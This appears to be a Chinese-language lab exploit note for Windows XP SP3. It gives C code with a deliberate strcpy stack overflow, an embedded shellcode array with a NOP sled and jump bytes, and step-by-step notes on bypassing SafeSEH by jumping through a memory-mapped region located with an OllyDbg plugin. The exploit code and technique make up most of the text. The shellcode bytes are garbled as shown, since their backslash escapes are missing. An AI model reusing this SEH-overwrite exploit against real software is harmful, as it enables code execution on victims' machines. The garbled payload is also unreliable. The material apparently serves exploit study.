/* XP SP3 VS2008 SafeSEH 保护 利用程序的 map状态的的映射文件 把它当成跳板 跳向我们的shellcode执行 */ #include #include char shellcode[]= "xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C" "x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53" "x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B" "x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95" "xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59" "x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A" "xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75" "xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03" "x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB" "x53" "x68x64x61x30x23" "x68x23x50x61x6E" "x8BxC4x53x50x50x53xFFx57xFCx53xFFx57xF8"//168 "x90x90" "x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90" "x90x90x90x90" "x90x90" "xE9x29xFFxFFxFFx90x90x90xEBxF6" "x0Bx0Bx28x00" ; DWORD MyException(void) { printf("There is an exception"); getchar(); return 1; } void test(char * input) { char str[200]; strcpy(str,input); int zero=0; __try { zero=1/zero; } __except(MyException()) { } } int _tmain(int argc, _TCHAR* argv[]) { //__asm int 3 test(shellcode); return 0; } ctrl+M  可以看到除了  EXE 和DLL模块之外的内存映射（类型为mao） 可以无视  SafeSEH的
下载插件 OllyFindAddr 可以在整个程序内存空间搜索    call/jmp dword ptr[ebp+n] http://bbs.pediy.com/showthread.php?t=136464

如果SEH是这个地址的话   恰好  可以调到  SEH的下一指针上
我们寻找的地址跳向    -》 SEH下一指针   然后这个指针上           不能直接跳向shellcode     因为直接  EB xxxxxxx  是5字节  会淹没我们的 SEH  那就会失败了 所以只有向上跳8字节     然后再跳向 shellcode起始地址就行了